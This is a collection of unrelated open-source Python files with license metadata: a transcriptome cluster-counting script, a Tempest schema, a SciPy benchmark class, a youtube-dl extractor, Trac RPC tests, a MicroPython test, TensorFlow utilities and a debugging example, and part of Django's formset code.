sys.exit('No cluster mapping file provided')
#Set transcriptome set names same as input fastas if none supplied
if transNameX is None:
transNameX = basename(os.path.splitext(transFastaX)[0])
if transNameY is None:
transNameY = basename(os.path.splitext(transFastaY)[0])
#Returns dict keyed by transcript name, mapping transcriptome set names
transSets = tranDict(transFastaX, transFastaY, transNameX, transNameY)
#Returns dict keyed by cluster name, with first level dict 'Seq' containing a list of transcripts belonging to cluster.
#clustMem[clustID]['Seqs']
clustMem = mapDict(clustMap)
#Appends sub-dictionaries to clust mem to store member counts for each transcriptome input file
clustMemCounts = memStats(clustMem, transSets, transNameX, transNameY)
#Returns dict with summary of clusters containing zero members from one or more of the reference transcriptomes
summaryDict = summaryStats(clustMemCounts)
#Write output file for cluster counts from each transcriptome
summaryFile = open(outFile,'w')
header = "\t".join(['clusterID', transNameX, transNameY, 'Total_Members'])
summaryFile.write(header + "\n")
for cluster in clustMemCounts.iterkeys():
#print 'this is the cluster: '
#print clustMemCounts[cluster]
#print 'x count =' + str(clustMemCounts[cluster]['countX'])
#print 'y count =' + str(clustMemCounts[cluster]['countY'])
summaryString = "\t".join([cluster, str(clustMemCounts[cluster]['countX']), str(clustMemCounts[cluster]['countY']), str(clustMemCounts[cluster]['countT'])])
#print 'writing summary string:'
#print summaryString + "\n"
summaryFile.write(summaryString + "\n")
summaryFile.close()
#Print summary stats to screen
print "\n" + 'Summary stats:'
print 'Clusters with 0 members from ' + transNameX + ': ' + str(summaryDict['zeroSetX'])
print 'Clusters with 0 members from ' + transNameY + ': ' + str(summaryDict['zeroSetY'])
print 'Clusters with 0 members from either ' + transNameX + ' or ' + transNameY + ': ' + str(summaryDict['zeroBoth'])
def tranDict(transFastaX, transFastaY, transNameX, transNameY):
#Create dictionary keyed by transcript name, mapping transcripts to their host transcriptome
#Create empty dictionary
transSets={}
#Read transcript names in as keys, add set name as value.
for seq_record in SeqIO.parse(transFastaX, "fasta"):
#Check if transcript name/key is unique
if seq_record.id not in transSets:
transSets[seq_record.id]=str(transNameX)
#If transcript name already exists exist with error
else:
sys.exit('Duplicate transcript name: ' + seq_record.id + ' in ' + transNameX)
for seq_record in SeqIO.parse(transFastaY, "fasta"):
if seq_record.id not in transSets:
transSets[seq_record.id]=str(transNameY)
else:
sys.exit('Duplicate transcript name: ' + seq_record.id + ' in ' + transNameY)
#print "This in the transcript to set dict:"
#print transSets
return transSets
def mapDict(clustMap):
#Read transcript-to-cluster mapping file into dict object.
#Sample data row:
#TranscriptID ClusterID
#nnt3Ldvymb Cluster-0.0
mapFile = open(clustMap, 'rt')
readMap = csv.reader(mapFile,delimiter='\t')
clustMem={}
#Write records for seqs in name file to new fasta
for row in readMap:
transID=row[0]
clustID=row[1]
#print 'reading transid'
#print row[0]
#print 'reading clustid'
#print row[1]
if clustID not in clustMem:
clustMem[clustID] = {}
clustMem[clustID]['Seqs'] = list()
clustMem[clustID]['Seqs'].append(transID)
mapFile.close()
#print 'clustmem dict, no counts'
#print clustMem
return clustMem
def memStats(clustMem, transSets, transNameX, transNameY):
for clustID in clustMem:
#For each cluster check each transcripts parent set.
clustMem[clustID]['countT'] = int()
clustMem[clustID]['countX'] = int()
clustMem[clustID]['countY'] = int()
for transID in clustMem[clustID]['Seqs']:
clustMem[clustID]['countT'] += 1
if transID not in transSets:
print 'No set name found for transcript: ' + transID
else:
if transSets[transID] == transNameX:
clustMem[clustID]['countX'] += 1
#
if transSets[transID] == transNameY:
clustMem[clustID]['countY'] += 1
clustMemCounts = clustMem
return clustMemCounts
def summaryStats(clustMemCounts):
summary = {}
summary['zeroSetX'] = int(0)
summary['zeroSetY'] = int(0)
summary['zeroBoth'] = int(0)
for cluster in clustMemCounts:
if clustMemCounts[cluster]['countX'] == 0:
summary['zeroSetX'] += 1
if clustMemCounts[cluster]['countY'] == 0:
summary['zeroSetY'] += 1
if clustMemCounts[cluster]['countX'] == 0 and clustMemCounts[cluster]['countY'] == 0:
summary['zeroBoth'] += 1
return summary
if __name__== '__main__':
###Argument handling.
arg_parser = argparse.ArgumentParser(description='For Corset clusters generated from two transcriptomes this program will report the number of transcripts from each transciptome that are members of each cluster.')
arg_parser.add_argument("-X","--transFastaX", required=True, help="Fasta file for transcriptome X")
arg_parser.add_argument("-Y","--transFastaY", required=True, help="Fasta file for transcriptome Y")
arg_parser.add_argument("-x","--transNameX", help="Unique lable for transcriptome X")
arg_parser.add_argument("-y","--transNameY", help="Unique lable for transcriptome Y")
arg_parser.add_argument("-o","--outFile", default='CountClusterMembers.txt', help="Location for summary file to be written to.")
arg_parser.add_argument("-c","--clustMap", required=True, help="Corset transcript-to-cluster mapping file.")
args = arg_parser.parse_args()
###Variable Definitions
transFastaX=args.transFastaX
transFastaY=args.transFastaY
transNameX=args.transNameX
transNameY=args.transNameY
outFile=args.outFile
clustMap=args.clustMap
main(transFastaX, transFastaY, transNameX, transNameY, clustMap, outFile) | gpl-2.0 |
tudorvio/tempest | tempest/api_schema/response/compute/v2_1/flavors_access.py | 38 | 1305 | # Copyright 2014 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
add_remove_list_flavor_access = {
'status_code': [200],
'response_body': {
'type': 'object',
'properties': {
'flavor_access': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'flavor_id': {'type': 'string'},
'tenant_id': {'type': 'string'},
},
'additionalProperties': False,
'required': ['flavor_id', 'tenant_id'],
}
}
},
'additionalProperties': False,
'required': ['flavor_access']
}
}
| apache-2.0 |
pbrod/scipy | benchmarks/benchmarks/go_benchmark_functions/go_benchmark.py | 36 | 6173 | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import (abs, arctan2, asarray, cos, exp, floor, log, log10,
arange, pi, prod, roll, seterr, sign, sin, sqrt, sum, where,
zeros, tan, tanh, dot)
try:
from scipy.special import factorial
except ImportError:
pass
class Benchmark(object):
"""
Defines a global optimization benchmark problem.
This abstract class defines the basic structure of a global
optimization problem. Subclasses should implement the ``fun`` method
for a particular optimization problem.
Attributes
----------
N : int
The dimensionality of the problem.
bounds : sequence
The lower/upper bounds to be used for minimizing the problem.
This a list of (lower, upper) tuples that contain the lower and upper
bounds for the problem. The problem should not be asked for evaluation
outside these bounds. ``len(bounds) == N``.
xmin : sequence
The lower bounds for the problem
xmax : sequence
The upper bounds for the problem
fglob : float
The global minimum of the evaluated function.
global_optimum : sequence
A list of vectors that provide the locations of the global minimum.
Note that some problems have multiple global minima, not all of which
may be listed.
nfev : int
the number of function evaluations that the object has been asked to
calculate.
change_dimensionality : bool
Whether we can change the benchmark function `x` variable length (i.e.,
the dimensionality of the problem)
custom_bounds : sequence
a list of tuples that contain lower/upper bounds for use in plotting.
"""
def __init__(self, dimensions):
"""
Initialises the problem
Parameters
----------
dimensions : int
The dimensionality of the problem
"""
self._dimensions = dimensions
self.nfev = 0
self.fglob = np.nan
self.global_optimum = None
self.change_dimensionality = False
self.custom_bounds = None
def __str__(self):
return '{0} ({1} dimensions)'.format(self.__class__.__name__, self.N)
def __repr__(self):
return self.__class__.__name__
def initial_vector(self):
"""
Random initialisation for the benchmark problem.
Returns
-------
x : sequence
a vector of length ``N`` that contains random floating point
numbers that lie between the lower and upper bounds for a given
parameter.
"""
return asarray([np.random.uniform(l, u) for l, u in self.bounds])
def success(self, x, tol=1.e-5):
"""
Tests if a candidate solution at the global minimum.
The default test is
Parameters
----------
x : sequence
The candidate vector for testing if the global minimum has been
reached. Must have ``len(x) == self.N``
tol : float
The evaluated function and known global minimum must differ by less
than this amount to be at a global minimum.
Returns
-------
bool : is the candidate vector at the global minimum?
"""
val = self.fun(asarray(x))
if abs(val - self.fglob) < tol:
return True
# the solution should still be in bounds, otherwise immediate fail.
if np.any(x > np.asfarray(self.bounds)[:, 1]):
return False
if np.any(x < np.asfarray(self.bounds)[:, 0]):
return False
# you found a lower global minimum. This shouldn't happen.
if val < self.fglob:
raise ValueError("Found a lower global minimum",
x,
val,
self.fglob)
return False
def fun(self, x):
"""
Evaluation of the benchmark function.
Parameters
----------
x : sequence
The candidate vector for evaluating the benchmark problem. Must
have ``len(x) == self.N``.
Returns
-------
val : float
the evaluated benchmark function
"""
raise NotImplementedError
def change_dimensions(self, ndim):
"""
Changes the dimensionality of the benchmark problem
The dimensionality will only be changed if the problem is suitable
Parameters
----------
ndim : int
The new dimensionality for the problem.
"""
if self.change_dimensionality:
self._dimensions = ndim
else:
raise ValueError('dimensionality cannot be changed for this'
'problem')
@property
def bounds(self):
"""
The lower/upper bounds to be used for minimizing the problem.
This a list of (lower, upper) tuples that contain the lower and upper
bounds for the problem. The problem should not be asked for evaluation
outside these bounds. ``len(bounds) == N``.
"""
if self.change_dimensionality:
return [self._bounds[0]] * self.N
else:
return self._bounds
@property
def N(self):
"""
The dimensionality of the problem.
Returns
-------
N : int
The dimensionality of the problem
"""
return self._dimensions
@property
def xmin(self):
"""
The lower bounds for the problem
Returns
-------
xmin : sequence
The lower bounds for the problem
"""
return asarray([b[0] for b in self.bounds])
@property
def xmax(self):
"""
The upper bounds for the problem
Returns
-------
xmax : sequence
The upper bounds for the problem
"""
return asarray([b[1] for b in self.bounds])
| bsd-3-clause |
gtko/CouchPotatoServer | couchpotato/core/media/movie/providers/trailer/youtube_dl/extractor/ninegag.py | 2 | 2542 | from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..utils import str_to_int
class NineGagIE(InfoExtractor):
IE_NAME = '9gag'
_VALID_URL = r'''(?x)^https?://(?:www\.)?9gag\.tv/
(?:
v/(?P<numid>[0-9]+)|
p/(?P<id>[a-zA-Z0-9]+)/(?P<display_id>[^?#/]+)
)
'''
_TESTS = [{
"url": "http://9gag.tv/v/1912",
"info_dict": {
"id": "1912",
"ext": "mp4",
"description": "This 3-minute video will make you smile and then make you feel untalented and insignificant. Anyway, you should share this awesomeness. (Thanks, Dino!)",
"title": "\"People Are Awesome 2013\" Is Absolutely Awesome",
"view_count": int,
"thumbnail": "re:^https?://",
},
'add_ie': ['Youtube']
},
{
'url': 'http://9gag.tv/p/KklwM/alternate-banned-opening-scene-of-gravity?ref=fsidebar',
'info_dict': {
'id': 'KklwM',
'ext': 'mp4',
'display_id': 'alternate-banned-opening-scene-of-gravity',
"description": "While Gravity was a pretty awesome movie already, YouTuber Krishna Shenoi came up with a way to improve upon it, introducing a much better solution to Sandra Bullock's seemingly endless tumble in space. The ending is priceless.",
'title': "Banned Opening Scene Of \"Gravity\" That Changes The Whole Movie",
},
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('numid') or mobj.group('id')
display_id = mobj.group('display_id') or video_id
webpage = self._download_webpage(url, display_id)
post_view = json.loads(self._html_search_regex(
r'var postView = new app\.PostView\({\s*post:\s*({.+?}),', webpage, 'post view'))
youtube_id = post_view['videoExternalId']
title = post_view['title']
description = post_view['description']
view_count = str_to_int(post_view['externalView'])
thumbnail = post_view.get('thumbnail_700w') or post_view.get('ogImageUrl') or post_view.get('thumbnail_300w')
return {
'_type': 'url_transparent',
'url': youtube_id,
'ie_key': 'Youtube',
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'view_count': view_count,
'thumbnail': thumbnail,
}
| gpl-3.0 |
Puppet-Finland/trac | files/xmlrpcplugin/trunk/tracrpc/tests/api.py | 1 | 5895 | # -*- coding: utf-8 -*-
"""
License: BSD
(c) 2009 ::: www.CodeResort.com - BV Network AS (simon-code@bvnetwork.no)
"""
import os
import unittest
import urllib2
from tracrpc.tests import rpc_testenv, TracRpcTestCase
from tracrpc.api import IRPCProtocol
from trac.core import *
from trac.test import Mock
class ProtocolProviderTestCase(TracRpcTestCase):
def setUp(self):
TracRpcTestCase.setUp(self)
def tearDown(self):
TracRpcTestCase.tearDown(self)
def test_invalid_content_type(self):
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'text/plain'},
data='Fail! No RPC for text/plain')
try:
resp = urllib2.urlopen(req)
self.fail("Expected urllib2.HTTPError")
except urllib2.HTTPError, e:
self.assertEquals(e.code, 415)
self.assertEquals(e.msg, "Unsupported Media Type")
self.assertEquals(e.fp.read(),
"No protocol matching Content-Type 'text/plain' at path '/rpc'.")
def test_rpc_info(self):
# Just try getting the docs for XML-RPC to test, it should always exist
from tracrpc.xml_rpc import XmlRpcProtocol
xmlrpc = XmlRpcProtocol(rpc_testenv.get_trac_environment())
name, docs = xmlrpc.rpc_info()
self.assertEquals(name, 'XML-RPC')
self.assertTrue('Content-Type: application/xml' in docs)
def test_valid_provider(self):
# Confirm the request won't work before adding plugin
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'application/x-tracrpc-test'},
data="Fail! No RPC for application/x-tracrpc-test")
try:
resp = urllib2.urlopen(req)
self.fail("Expected urllib2.HTTPError")
except urllib2.HTTPError, e:
self.assertEquals(e.code, 415)
# Make a new plugin
provider = os.path.join(rpc_testenv.tracdir, 'plugins', 'DummyProvider.py')
open(provider, 'w').write(
"from trac.core import *\n"
"from tracrpc.api import *\n"
"class DummyProvider(Component):\n"
" implements(IRPCProtocol)\n"
" def rpc_info(self):\n"
" return ('TEST-RPC', 'No Docs!')\n"
" def rpc_match(self):\n"
" yield ('rpc', 'application/x-tracrpc-test')\n"
" def parse_rpc_request(self, req, content_type):\n"
" return {'method' : 'system.getAPIVersion'}\n"
" def send_rpc_error(self, req, e):\n"
" rpcreq = req.rpc\n"
" req.send_error(None, template='', content_type=rpcreq['mimetype'],\n"
" status=500, env=None, data='Test failure ')\n"
" def send_rpc_result(self, req, result):\n"
" rpcreq = req.rpc\n"
" # raise KeyError('Here')\n"
" response = 'Got a result!'\n"
" req.send(response, rpcreq['mimetype'], 200)\n")
rpc_testenv.restart()
try:
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'application/x-tracrpc-test'})
resp = urllib2.urlopen(req)
self.assertEquals(200, resp.code)
self.assertEquals("Got a result!", resp.read())
self.assertEquals(resp.headers['Content-Type'],
'application/x-tracrpc-test;charset=utf-8')
finally:
# Clean up so that provider don't affect further tests
os.unlink(provider)
rpc_testenv.restart()
def test_general_provider_error(self):
# Make a new plugin and restart server
provider = os.path.join(rpc_testenv.tracdir, 'plugins', 'DummyProvider.py')
open(provider, 'w').write(
"from trac.core import *\n"
"from tracrpc.api import *\n"
"class DummyProvider(Component):\n"
" implements(IRPCProtocol)\n"
" def rpc_info(self):\n"
" return ('TEST-RPC', 'No Docs!')\n"
" def rpc_match(self):\n"
" yield ('rpc', 'application/x-tracrpc-test')\n"
" def parse_rpc_request(self, req, content_type):\n"
" return {'method' : 'system.getAPIVersion'}\n"
" def send_rpc_error(self, req, e):\n"
" if isinstance(e, RPCError) :\n"
" req.send_error(None, template='', \n"
" content_type='text/plain',\n"
" status=500, env=None, data=e.message)\n"
" else :\n"
" req.send_error(None, template='', \n"
" content_type='text/plain',\n"
" status=500, env=None, data='Test failure')\n"
" def send_rpc_result(self, req, result):\n"
" raise RPCError('No good.')")
rpc_testenv.restart()
# Make the request
try:
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'application/x-tracrpc-test'})
resp = urllib2.urlopen(req)
except urllib2.HTTPError, e:
self.assertEquals(500, e.code)
self.assertEquals("No good.", e.fp.read())
self.assertTrue(e.hdrs['Content-Type'].startswith('text/plain'))
finally:
# Clean up so that provider don't affect further tests
os.unlink(provider)
rpc_testenv.restart()
def test_suite():
return unittest.makeSuite(ProtocolProviderTestCase)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| bsd-2-clause |
Timmenem/micropython | tests/basics/gen_yield_from_ducktype.py | 107 | 1034 | class MyGen:
def __init__(self):
self.v = 0
def __iter__(self):
return self
def __next__(self):
self.v += 1
if self.v > 5:
raise StopIteration
return self.v
def gen():
yield from MyGen()
def gen2():
yield from gen()
print(list(gen()))
print(list(gen2()))
class Incrementer:
def __iter__(self):
return self
def __next__(self):
return self.send(None)
def send(self, val):
if val is None:
return "Incrementer initialized"
return val + 1
def gen3():
yield from Incrementer()
g = gen3()
print(next(g))
print(g.send(5))
print(g.send(100))
#
# Test proper handling of StopIteration vs other exceptions
#
class MyIter:
def __iter__(self):
return self
def __next__(self):
raise StopIteration(42)
def gen4():
global ret
ret = yield from MyIter()
1//0
ret = None
try:
print(list(gen4()))
except ZeroDivisionError:
print("ZeroDivisionError")
print(ret)
| mit |
chemelnucfin/tensorflow | tensorflow/python/util/decorator_utils.py | 32 | 4132 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions for writing decorators (which modify docstrings)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
def get_qualified_name(function):
# Python 3
if hasattr(function, '__qualname__'):
return function.__qualname__
# Python 2
if hasattr(function, 'im_class'):
return function.im_class.__name__ + '.' + function.__name__
return function.__name__
def _normalize_docstring(docstring):
"""Normalizes the docstring.
Replaces tabs with spaces, removes leading and trailing blanks lines, and
removes any indentation.
Copied from PEP-257:
https://www.python.org/dev/peps/pep-0257/#handling-docstring-indentation
Args:
docstring: the docstring to normalize
Returns:
The normalized docstring
"""
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
# (we use sys.maxsize because sys.maxint doesn't exist in Python 3)
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join(trimmed)
def add_notice_to_docstring(
doc, instructions, no_doc_str, suffix_str, notice):
"""Adds a deprecation notice to a docstring.
Args:
doc: The original docstring.
instructions: A string, describing how to fix the problem.
no_doc_str: The default value to use for `doc` if `doc` is empty.
suffix_str: Is added to the end of the first line.
notice: A list of strings. The main notice warning body.
Returns:
A new docstring, with the notice attached.
Raises:
ValueError: If `notice` is empty.
"""
if not doc:
lines = [no_doc_str]
else:
lines = _normalize_docstring(doc).splitlines()
lines[0] += ' ' + suffix_str
if not notice:
raise ValueError('The `notice` arg must not be empty.')
notice[0] = 'Warning: ' + notice[0]
notice = [''] + notice + ([instructions] if instructions else [])
if len(lines) > 1:
# Make sure that we keep our distance from the main body
if lines[1].strip():
notice.append('')
lines[1:1] = notice
else:
lines += notice
return '\n'.join(lines)
def validate_callable(func, decorator_name):
if not hasattr(func, '__call__'):
raise ValueError(
'%s is not a function. If this is a property, make sure'
' @property appears before @%s in your source code:'
'\n\n@property\n@%s\ndef method(...)' % (
func, decorator_name, decorator_name))
class classproperty(object): # pylint: disable=invalid-name
"""Class property decorator.
Example usage:
class MyClass(object):
@classproperty
def value(cls):
return '123'
> print MyClass.value
123
"""
def __init__(self, func):
self._func = func
def __get__(self, owner_self, owner_cls):
return self._func(owner_cls)
| apache-2.0 |
scenarios/tensorflow | tensorflow/python/debug/examples/debug_tflearn_iris.py | 23 | 6482 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Debug the tf-learn iris example, based on the tf-learn tutorial."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import sys
import tempfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn.datasets import base
from tensorflow.python import debug as tf_debug
# URLs to download data sets from, if necessary.
IRIS_TRAINING_DATA_URL = "https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/tutorials/monitors/iris_training.csv"
IRIS_TEST_DATA_URL = "https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/tutorials/monitors/iris_test.csv"
def maybe_download_data(data_dir):
"""Download data sets if necessary.
Args:
data_dir: Path to where data should be downloaded.
Returns:
Paths to the training and test data files.
"""
if not os.path.isdir(data_dir):
os.makedirs(data_dir)
training_data_path = os.path.join(data_dir,
os.path.basename(IRIS_TRAINING_DATA_URL))
if not os.path.isfile(training_data_path):
train_file = open(training_data_path, "wt")
urllib.request.urlretrieve(IRIS_TRAINING_DATA_URL, train_file.name)
train_file.close()
print("Training data are downloaded to %s" % train_file.name)
test_data_path = os.path.join(data_dir, os.path.basename(IRIS_TEST_DATA_URL))
if not os.path.isfile(test_data_path):
test_file = open(test_data_path, "wt")
urllib.request.urlretrieve(IRIS_TEST_DATA_URL, test_file.name)
test_file.close()
print("Test data are downloaded to %s" % test_file.name)
return training_data_path, test_data_path
_IRIS_INPUT_DIM = 4
def iris_input_fn():
iris = base.load_iris()
features = tf.reshape(tf.constant(iris.data), [-1, _IRIS_INPUT_DIM])
labels = tf.reshape(tf.constant(iris.target), [-1])
return features, labels
def main(_):
# Load datasets.
if FLAGS.fake_data:
training_set = tf.contrib.learn.datasets.base.Dataset(
np.random.random([120, 4]),
np.random.random_integers(3, size=[120]) - 1)
test_set = tf.contrib.learn.datasets.base.Dataset(
np.random.random([30, 4]),
np.random.random_integers(3, size=[30]) - 1)
else:
training_data_path, test_data_path = maybe_download_data(FLAGS.data_dir)
training_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=training_data_path,
target_dtype=np.int,
features_dtype=np.float32)
test_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=test_data_path, target_dtype=np.int, features_dtype=np.float32)
# Specify that all features have real-value data
feature_columns = [tf.contrib.layers.real_valued_column("", dimension=4)]
# Build 3 layer DNN with 10, 20, 10 units respectively.
model_dir = FLAGS.model_dir or tempfile.mkdtemp(prefix="debug_tflearn_iris_")
classifier = tf.contrib.learn.DNNClassifier(
feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
model_dir=model_dir)
hooks = None
if FLAGS.debug:
debug_hook = tf_debug.LocalCLIDebugHook(ui_type=FLAGS.ui_type)
debug_hook.add_tensor_filter("has_inf_or_nan", tf_debug.has_inf_or_nan)
hooks = [debug_hook]
if not FLAGS.use_experiment:
# Fit model.
classifier.fit(x=training_set.data,
y=training_set.target,
steps=FLAGS.train_steps,
monitors=hooks)
# Evaluate accuracy.
accuracy_score = classifier.evaluate(x=test_set.data,
y=test_set.target,
hooks=hooks)["accuracy"]
else:
ex = experiment.Experiment(classifier,
train_input_fn=iris_input_fn,
eval_input_fn=iris_input_fn,
train_steps=FLAGS.train_steps,
eval_delay_secs=0,
eval_steps=1,
train_monitors=hooks,
eval_hooks=hooks)
ex.train()
accuracy_score = ex.evaluate()["accuracy"]
print("After training %d steps, Accuracy = %f" %
(FLAGS.train_steps, accuracy_score))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.register("type", "bool", lambda v: v.lower() == "true")
parser.add_argument(
"--data_dir",
type=str,
default="/tmp/iris_data",
help="Directory to save the training and test data in.")
parser.add_argument(
"--model_dir",
type=str,
default="",
help="Directory to save the trained model in.")
parser.add_argument(
"--train_steps",
type=int,
default=10,
help="Number of steps to run trainer.")
parser.add_argument(
"--use_experiment",
type="bool",
nargs="?",
const=True,
default=False,
help="Use tf.contrib.learn Experiment to run training and evaluation")
parser.add_argument(
"--ui_type",
type=str,
default="curses",
help="Command-line user interface type (curses | readline)")
parser.add_argument(
"--fake_data",
type="bool",
nargs="?",
const=True,
default=False,
help="Use fake MNIST data for unit testing")
parser.add_argument(
"--debug",
type="bool",
nargs="?",
const=True,
default=False,
help="Use debugger to track down bad values during training")
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
JakeBrand/CMPUT410-E6 | v1/lib/python2.7/site-packages/django/forms/formsets.py | 49 | 17531 | from __future__ import unicode_literals
from django.core.exceptions import ValidationError
from django.forms import Form
from django.forms.fields import IntegerField, BooleanField
from django.forms.utils import ErrorList
from django.forms.widgets import HiddenInput
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils import six
from django.utils.six.moves import xrange
from django.utils.translation import ungettext, ugettext as _
__all__ = ('BaseFormSet', 'formset_factory', 'all_valid')
# special field names
TOTAL_FORM_COUNT = 'TOTAL_FORMS'
INITIAL_FORM_COUNT = 'INITIAL_FORMS'
MIN_NUM_FORM_COUNT = 'MIN_NUM_FORMS'
MAX_NUM_FORM_COUNT = 'MAX_NUM_FORMS'
ORDERING_FIELD_NAME = 'ORDER'
DELETION_FIELD_NAME = 'DELETE'
# default minimum number of forms in a formset
DEFAULT_MIN_NUM = 0
# default maximum number of forms in a formset, to prevent memory exhaustion
DEFAULT_MAX_NUM = 1000
class ManagementForm(Form):
"""
``ManagementForm`` is used to keep track of how many form instances
are displayed on the page. If adding new forms via javascript, you should
increment the count field of this form as well.
"""
def __init__(self, *args, **kwargs):
self.base_fields[TOTAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
self.base_fields[INITIAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
# MIN_NUM_FORM_COUNT and MAX_NUM_FORM_COUNT are output with the rest of
# the management form, but only for the convenience of client-side
# code. The POST value of them returned from the client is not checked.
self.base_fields[MIN_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
self.base_fields[MAX_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
super(ManagementForm, self).__init__(*args, **kwargs)
@python_2_unicode_compatible
class BaseFormSet(object):
"""
A collection of instances of the same Form class.
"""
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList):
self.is_bound = data is not None or files is not None
self.prefix = prefix or self.get_default_prefix()
self.auto_id = auto_id
self.data = data or {}
self.files = files or {}
self.initial = initial
self.error_class = error_class
self._errors = None
self._non_form_errors = None
def __str__(self):
return self.as_table()
def __iter__(self):
"""Yields the forms in the order they should be rendered"""
return iter(self.forms)
def __getitem__(self, index):
"""Returns the form at the given index, based on the rendering order"""
return self.forms[index]
def __len__(self):
return len(self.forms)
def __bool__(self):
"""All formsets have a management form which is not included in the length"""
return True
def __nonzero__(self): # Python 2 compatibility
return type(self).__bool__(self)
@property
def management_form(self):
"""Returns the ManagementForm instance for this FormSet."""
if self.is_bound:
form = ManagementForm(self.data, auto_id=self.auto_id, prefix=self.prefix)
if not form.is_valid():
raise ValidationError(
_('ManagementForm data is missing or has been tampered with'),
code='missing_management_form',
)
else:
form = ManagementForm(auto_id=self.auto_id, prefix=self.prefix, initial={
TOTAL_FORM_COUNT: self.total_form_count(),
INITIAL_FORM_COUNT: self.initial_form_count(),
MIN_NUM_FORM_COUNT: self.min_num,
MAX_NUM_FORM_COUNT: self.max_num
})
return form
def total_form_count(self):
"""Returns the total number of forms in this FormSet."""
if self.is_bound:
# return absolute_max if it is lower than the actual total form
# count in the data; this is DoS protection to prevent clients
# from forcing the server to instantiate arbitrary numbers of
# forms
return min(self.management_form.cleaned_data[TOTAL_FORM_COUNT], self.absolute_max)
else:
initial_forms = self.initial_form_count()
total_forms = max(initial_forms, self.min_num) + self.extra
# Allow all existing related objects/inlines to be displayed,
# but don't allow extra beyond max_num.
if initial_forms > self.max_num >= 0:
total_forms = initial_forms
elif total_forms > self.max_num >= 0:
total_forms = self.max_num
return total_forms
def initial_form_count(self):
"""Returns the number of forms that are required in this FormSet."""
if self.is_bound:
return self.management_form.cleaned_data[INITIAL_FORM_COUNT]
else:
# Use the length of the initial data if it's there, 0 otherwise.
initial_forms = len(self.initial) if self.initial else 0
return initial_forms
@cached_property
def forms(self):
"""
Instantiate forms at first property access.
"""
# DoS protection is included in total_form_count()
forms = [self._construct_form(i) for i in xrange(self.total_form_count())]
return forms
def _construct_form(self, i, **kwargs):
"""
Instantiates and returns the i-th form instance in a formset.
"""
defaults = {
'auto_id': self.auto_id,
'prefix': self.add_prefix(i),
'error_class': self.error_class,
}
if self.is_bound:
defaults['data'] = self.data
defaults['files'] = self.files
if self.initial and 'initial' not in kwargs:
try:
defaults['initial'] = self.initial[i]
except IndexError:
pass
# Allow extra forms to be empty, unless they're part of
# the minimum forms.
if i >= self.initial_form_count() and i >= self.min_num:
defaults['empty_permitted'] = True
defaults.update(kwargs)
form = self.form(**defaults)
self.add_fields(form, i)
return form
@property
def initial_forms(self):
"""Return a list of all the initial forms in this formset."""
return self.forms[:self.initial_form_count()]
@property
def extra_forms(self):
"""Return a list of all the extra forms in this formset."""
return self.forms[self.initial_form_count():]
@property
def empty_form(self):
form = self.form(
auto_id=self.auto_id,
